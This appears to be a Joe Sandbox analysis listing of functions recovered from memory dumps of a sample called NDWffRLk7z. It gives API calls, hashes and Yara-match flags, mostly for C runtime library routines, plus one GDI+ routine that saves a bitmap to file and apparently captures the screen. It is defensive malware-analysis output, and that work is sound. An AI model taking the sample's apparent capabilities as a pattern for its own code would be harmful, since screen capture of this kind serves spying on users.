API String ID: 3496964030-0
Opcode ID: 17bd562b5d5d9d9cfdfa562d227ccadc57b46c4ced5fec5b9a2592468eba907b
Instruction ID: 5764c435eaed7dd7f7c8ea1249de5416537e9314697491846a311796ebd994a7
Opcode Fuzzy Hash: 17bd562b5d5d9d9cfdfa562d227ccadc57b46c4ced5fec5b9a2592468eba907b
Instruction Fuzzy Hash: 63310731A406219FCB26EF65C840BAEB7B2FF44710F1545A9EC269B251DB30E845CFD4

Function 02138F14 Relevance: 9.1, APIs: 6, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

FindSITargetTypeInstance.LIBVCRUNTIME ref: 02138F67
FindMITargetTypeInstance.LIBVCRUNTIME ref: 02138F80
FindVITargetTypeInstance.LIBVCRUNTIME ref: 02138F87
PMDtoOffset.LIBCMT ref: 02138FA6

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: FindInstanceTargetType$Offset
String ID:
API String ID: 1467055271-0
Opcode ID: be68cb40e55dd2292cbbce737d8ca9aab969a3a65d4eb3b761b4647cdf86019d
Instruction ID: c84efef39272e513a2ed773b0097c3fad50a7154820d8f97dda0575c891dda6b
Opcode Fuzzy Hash: be68cb40e55dd2292cbbce737d8ca9aab969a3a65d4eb3b761b4647cdf86019d
Instruction Fuzzy Hash: 71213872684204AFDF1ADF68DC45EAE77ABEF44720B16812AF915D3180D731E900CA90

Function 0211542D Relevance: 9.1, APIs: 6, Instructions: 82COMMON

Download Yara Rule

APIs

__Cnd_init.LIBCPMT ref: 02115441
__Mtx_init.LIBCPMT ref: 02115467
std::_Cnd_initX.LIBCPMT ref: 0211548A
__Thrd_start.LIBCPMT ref: 021154AF
std::_Cnd_waitX.LIBCPMT ref: 021154CF
std::_Cnd_initX.LIBCPMT ref: 021154FC

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
String ID:
API String ID: 1687354797-0
Opcode ID: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
Instruction ID: 7d0cdd3fc003716e9be3ee475824cadaabee6ac8645054d06651ef8c938f38ac
Opcode Fuzzy Hash: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
Instruction Fuzzy Hash: 2121A372C84208AEDF11EBB4E841BDDB7FAAF08325F54403AE104B3580DB7499448F65

Function 02139031 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,02139028,021369B9,021508F7,00000008,02150C5C,?,?,?,?,02133CA2,?,?,0045A064), ref: 0213903F
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0213904D
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02139066
SetLastError.KERNEL32(00000000,?,02139028,021369B9,021508F7,00000008,02150C5C,?,?,?,?,02133CA2,?,?,0045A064), ref: 021390B8

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
Instruction ID: 30d0af08844dc23f0a6e024a13bcbbe9d42de63a7bc999d14acd36e95428bf33
Opcode Fuzzy Hash: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
Instruction Fuzzy Hash: 4201F7321897116EF72B2BB46C88A6B275BEF45775B300339E530452F0EFB288115989

Function 00428DCA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00428DC1,00426752,00440690,00000008,004409F5,?,?,?,?,00423A3B,?,?,5381DE58), ref: 00428DD8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DE6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428DFF
SetLastError.KERNEL32(00000000,?,00428DC1,00426752,00440690,00000008,004409F5,?,?,?,?,00423A3B,?,?,5381DE58), ref: 00428E51

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
Instruction ID: 758f7159784acd0a18ffe6e4d50e04bfafef725c819603ece3ff961fbf0e5b5e
Opcode Fuzzy Hash: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
Instruction Fuzzy Hash: E001F53230A7316EA6242BF57C8966B2744EB0577AB60033FF510902E2EE198C20554D

Function 02114FAF Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 02114FC0
int.LIBCPMT ref: 02114FD7

Part of subcall function 0211BFB9: std::_Lockit::_Lockit.LIBCPMT ref: 0211BFCA
Part of subcall function 0211BFB9: std::_Lockit::~_Lockit.LIBCPMT ref: 0211BFE4

std::locale::_Getfacet.LIBCPMT ref: 02114FE0
std::_Facet_Register.LIBCPMT ref: 02115011
std::_Lockit::~_Lockit.LIBCPMT ref: 02115027
__CxxThrowException@8.LIBVCRUNTIME ref: 02115045

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
Instruction ID: ba5ca9e2425d1f8012d53b1ccf26871e2cf55a45b31e5499b4919d3f51ff42bb
Opcode Fuzzy Hash: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
Instruction Fuzzy Hash: 8311CE72980229AFCB25EBA4D800BED77B2BF84715F510439E815AB2D1DB749A05CFD1

Function 00404D48 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404D59
int.LIBCPMT ref: 00404D70

Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D

std::locale::_Getfacet.LIBCPMT ref: 00404D79
std::_Facet_Register.LIBCPMT ref: 00404DAA
std::_Lockit::~_Lockit.LIBCPMT ref: 00404DC0
__CxxThrowException@8.LIBVCRUNTIME ref: 00404DDE

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
Instruction ID: 1dda4c75b92fe2b5e69280e9b804bb78dd99b554210e3ff263920cc003329bbf
Opcode Fuzzy Hash: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
Instruction Fuzzy Hash: 7A11A3B19001249BCB15EBA0C841AEE77B4AF54319F20053EE912B72D2DB7C9A0587DD

Function 004054C8 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 004054D9
int.LIBCPMT ref: 004054F0

Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D

std::locale::_Getfacet.LIBCPMT ref: 004054F9
std::_Facet_Register.LIBCPMT ref: 0040552A
std::_Lockit::~_Lockit.LIBCPMT ref: 00405540
__CxxThrowException@8.LIBVCRUNTIME ref: 0040555E

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 37f25b241d5d005f4bd9263ef804b6f161f9b1aae0f4e3bd922510fed2236106
Instruction ID: af26afd1e9f0003da21f47bd393f770a5ce721ed4ca6619ce042a6dd0fbef1f6
Opcode Fuzzy Hash: 37f25b241d5d005f4bd9263ef804b6f161f9b1aae0f4e3bd922510fed2236106
Instruction Fuzzy Hash: 8711A071900628ABCB10EBA4CC41AAE7770AF54319F60053EE815BB2D2DB7C9E458F9C

Function 00405564 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00405575
int.LIBCPMT ref: 0040558C

Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D

std::locale::_Getfacet.LIBCPMT ref: 00405595
std::_Facet_Register.LIBCPMT ref: 004055C6
std::_Lockit::~_Lockit.LIBCPMT ref: 004055DC
__CxxThrowException@8.LIBVCRUNTIME ref: 004055FA

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 10c420daa13962d8c34f07d8e5e57f80696a88d0a8cb060a21b1ba5f72c37537
Instruction ID: 4f98c6a968a786bbabe9cf8dd1bd77c0c3f582db622070c6a9572df94363bb86
Opcode Fuzzy Hash: 10c420daa13962d8c34f07d8e5e57f80696a88d0a8cb060a21b1ba5f72c37537
Instruction Fuzzy Hash: B111A371900524ABCB14EBA1CC41AAE7770AF54315F20003FF812BB2D2DB7C9A05CB9C

Function 00404E59 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00404E60

Part of subcall function 0040BB3D: __EH_prolog3_GS.LIBCMT ref: 0040BB44

std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EAB
__Getcoll.LIBCPMT ref: 00404EBA
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ECA

Strings

\J@, xrefs: 00404EB4

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID: \J@
API String ID: 1836011271-3870157017
Opcode ID: ecd6d36a17cc43e97ba93c01a623e75c6b96a429ac6ca8fec0051df99147ca39
Instruction ID: fdee6073741f171039223b21022534e6c74e6b1a9002e69b8caf09e8127dea3b
Opcode Fuzzy Hash: ecd6d36a17cc43e97ba93c01a623e75c6b96a429ac6ca8fec0051df99147ca39
Instruction Fuzzy Hash: 1E0169719102099FDB10EFA5C441B9DB7B0FF44319F00803EE145BB6C1DB789544CB99

Function 0042FED4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE85,00000003,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002), ref: 0042FEF4
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF07
FreeLibrary.KERNEL32(00000000,?,?,?,0042FE85,00000003,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002,00000000), ref: 0042FF2A

Strings

mscoree.dll, xrefs: 0042FEED
CorExitProcess, xrefs: 0042FEFF

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: d200b2febff7f97f8a2c3bc9b8f7fbb30bc0a4b2d93706d62895116e71432848
Instruction ID: 04c50191246c36c7712c7b2292fbce18726cdb65abb1a7ec348a7059dfc2f8e8
Opcode Fuzzy Hash: d200b2febff7f97f8a2c3bc9b8f7fbb30bc0a4b2d93706d62895116e71432848
Instruction Fuzzy Hash: D8F0C831A10218BBDB109F90DD09B9EBFB4EF05B12F510076F805A2290CF795E44CB8C

Function 0041CDFD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE11
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE35
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE48
__CxxThrowException@8.LIBVCRUNTIME ref: 0041CE56

Strings

pScheduler, xrefs: 0041CE40

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 3657713681-923244539
Opcode ID: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
Instruction ID: eb07aeb186abff06dd5fb113d00e985a326b9016228af1cb3add82d84dc8ee7b
Opcode Fuzzy Hash: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
Instruction Fuzzy Hash: 56F05935A40704A3C714FB05DC92CDEB3799E90718760812FE40663182DB7CAD8AC29D

Function 021508E1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 021508E8
make_shared.LIBCPMT ref: 02150933

Strings

MOC, xrefs: 0215090B
f)D, xrefs: 021508E3
RCC, xrefs: 0215091A

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: H_prolog3_catchmake_shared
String ID: MOC$RCC$f)D
API String ID: 3472968176-2775210027
Opcode ID: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
Instruction ID: cfb1a70fdaa63d388d3b1d36b91e3da0f0232dd2696186fe7be6fdb8b57ca353
Opcode Fuzzy Hash: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
Instruction Fuzzy Hash: F5F0CD30580264EFDB16EFA5C440A6C3B7AAF0EB00F8280D0F8145B264CB789A00DFA6

Function 0213B35D Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
Instruction ID: 46cb8dd82b5f5ec8d3f4ebf2a8543e5a8573c983c0012bc2a16fdd5f24c5b0bc
Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
Instruction Fuzzy Hash: CB71B672A892169FDB27CF54CC84ABFBB77FF45368F544229E411A7180E7709A41CBA0

Function 0042B0F6 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bca2f52f1a06bb0bf5b391d4a2a7ad694c8b7147332e52eee2e888435f9a20d7
Instruction ID: 170f1839d68b6508eaaaec35cfa06bac438a8aba58ef65257e70e7e464c4b835
Opcode Fuzzy Hash: bca2f52f1a06bb0bf5b391d4a2a7ad694c8b7147332e52eee2e888435f9a20d7
Instruction Fuzzy Hash: 3B71AF31B00266DBCB21CF95E884ABFBB75EF41360B98426BE81067290DB749D45C7E9

Function 02140C9B Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 021438FE: RtlAllocateHeap.NTDLL(00000000,0211DACD,00000000), ref: 02143930

_free.LIBCMT ref: 02140DA6
_free.LIBCMT ref: 02140DBD
_free.LIBCMT ref: 02140DDC
_free.LIBCMT ref: 02140DF7
_free.LIBCMT ref: 02140E0E

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
Instruction ID: 9fc9c03ae54b3a684b0c0fccefcc1a9e7e1d1e0c5813e803a72424bc626e3957
Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
Instruction Fuzzy Hash: 0451C431A80305AFDB28DF2AD841B6AB7F5EF48724B14056DEA0DD7250EB36E915CF80

Function 00430A34 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00433697: RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9

_free.LIBCMT ref: 00430B3F
_free.LIBCMT ref: 00430B56
_free.LIBCMT ref: 00430B75
_free.LIBCMT ref: 00430B90
_free.LIBCMT ref: 00430BA7

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 77b92977eb72739321cda5c8df294ab32c7ea205dca145f02ee4833a4b4424fc
Instruction ID: 2fc0cbae349d2941fff749f5b49d8ba5872ca9652a97fa93675838e70d9d8155
Opcode Fuzzy Hash: 77b92977eb72739321cda5c8df294ab32c7ea205dca145f02ee4833a4b4424fc
Instruction Fuzzy Hash: 3F51D131A00304AFEB219F69D851B6BB7F4EF5C724F14566EE809D7251E739E901CB88

Function 02141732 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 021417A4
_free.LIBCMT ref: 021417C4

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
Instruction ID: 576eb056f15167bc080cfbe29378a25451b63aa838dbefec75d83f3141a95a2a
Opcode Fuzzy Hash: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
Instruction Fuzzy Hash: 2741C136E40314AFCB14DF78C980A5DB7A6EF89714B1545A9E619EB381EB31E941CB80

Function 004314CB Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043153D
_free.LIBCMT ref: 0043155D

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
Instruction ID: 2c394445bd20a04972dd2082f140732d1460e75e39bee70d4e52ced8c5000be3
Opcode Fuzzy Hash: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
Instruction Fuzzy Hash: 7A41C432A00304ABCB10DF78C981A5EB7E5EF89714F15456AE616EB391DB35ED01CB88

Function 0043688D Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0EA,00000000,00000000,0042D928,?,0042D928,?,00000001,0042D0EA,23E85006,00000001,0042D928,0042D928), ref: 004368DA
__alloca_probe_16.LIBCMT ref: 00436912
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436963
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436975
__freea.LIBCMT ref: 0043697E

Part of subcall function 00433697: RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: f65b0bdcdd2dc54c9e9de8c3602f0d94bdb7d7793a3f10faf503cccdbbfc5f31
Instruction ID: d963c907df35f4e1b8a381e23a898db453a996a2d0481b790983a8c47d787b2f
Opcode Fuzzy Hash: f65b0bdcdd2dc54c9e9de8c3602f0d94bdb7d7793a3f10faf503cccdbbfc5f31
Instruction Fuzzy Hash: 5F31F072A0021AABDF259F65DC41EAF7BA5EF44710F15422AFC04D7290EB39CD54CB94

Function 0212B11D Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0212B142

Part of subcall function 02121178: _SpinWait.LIBCONCRT ref: 02121190

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0212B156
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0212B188
List.LIBCMT ref: 0212B20B
List.LIBCMT ref: 0212B21A

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: 412e926916d4707ad4bdb87e4df70d0866a2e761e0501b7c3a349567627f0364
Instruction ID: 489c4d13bcaecf08a5b76355b6136965a6afa15ab4cfdcfb2e78f24d06ea979b
Opcode Fuzzy Hash: 412e926916d4707ad4bdb87e4df70d0866a2e761e0501b7c3a349567627f0364
Instruction Fuzzy Hash: A3318832D89636DFCB18EFA4E5906EDB7B2BF04308F05006AE80177251DB317A28CB94

Function 0041AEB6 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0041AEDB

Part of subcall function 00410F11: _SpinWait.LIBCONCRT ref: 00410F29

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEEF
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF21
List.LIBCMT ref: 0041AFA4
List.LIBCMT ref: 0041AFB3

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: f58ac660b0453a3e9b818a0a9febcd8ba4b28c7f9e8e1f6154efc2f6275add08
Instruction ID: 8a1b27d7ac99c42c423c038c6da62c4f09041a57878ada6c0d5966c490a343f4
Opcode Fuzzy Hash: f58ac660b0453a3e9b818a0a9febcd8ba4b28c7f9e8e1f6154efc2f6275add08
Instruction Fuzzy Hash: 76318B71A02719DFCB10EFA5D5915EEB7B1BF04308F04006FE80167242DB796DA5CB9A

Function 0040202E Relevance: 7.6, APIs: 5, Instructions: 80memoryfilewindowCOMMON

Download Yara Rule

APIs

GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00402060
GdipAlloc.GDIPLUS(00000010), ref: 00402068
GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 00402083
GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020AD
GdiplusShutdown.GDIPLUS(?), ref: 004020D9

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
String ID:
API String ID: 2357751836-0
Opcode ID: c047b4a56322b1034ae7938cbcb78c43e1d8d2715f6ad981a1214ddf5e978d77
Instruction ID: 3210944159f0fc98eb109693a3395d5946c9c878d3acb397b58b4dcf5ef0325c
Opcode Fuzzy Hash: c047b4a56322b1034ae7938cbcb78c43e1d8d2715f6ad981a1214ddf5e978d77
Instruction Fuzzy Hash: E72171B5A0031AAFCB10DF65DD459AFFBB8FF48741B104036EA02E3290D7759901CBA8

Function 021150BC Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo.LIBCPMT ref: 02115099
std::_Locinfo::~_Locinfo.LIBCPMT ref: 021150AD

Part of subcall function 0211BDA4: __EH_prolog3_GS.LIBCMT ref: 0211BDAB

std::_Locinfo::_Locinfo.LIBCPMT ref: 02115112
__Getcoll.LIBCPMT ref: 02115121
std::_Locinfo::~_Locinfo.LIBCPMT ref: 02115131

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: Locinfostd::_$Locinfo::_Locinfo::~_$GetcollH_prolog3_
String ID:
API String ID: 1844465188-0
Opcode ID: 44aaa5f46009dce830ee941fe4bea5556b318a4865790ba87b622e4823c10ac4
Instruction ID: c89cd8927033828484cadc6b84987b48c326eaac2a6901db019e345a7d65246c
Opcode Fuzzy Hash: 44aaa5f46009dce830ee941fe4bea5556b318a4865790ba87b622e4823c10ac4
Instruction Fuzzy Hash: 6B21CD72894308EFDB14EFA0D4447DDBBB2BF90721F50812ED485AB281DBB48944CF92

Function 021421B5 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(0211DACD,0211DACD,00000002,0213ED25,02143941,00000000,?,021369F5,00000002,00000000,00000000,00000000,?,0211CF7E,0211DACD,00000004), ref: 021421BA
_free.LIBCMT ref: 021421EF
_free.LIBCMT ref: 02142216
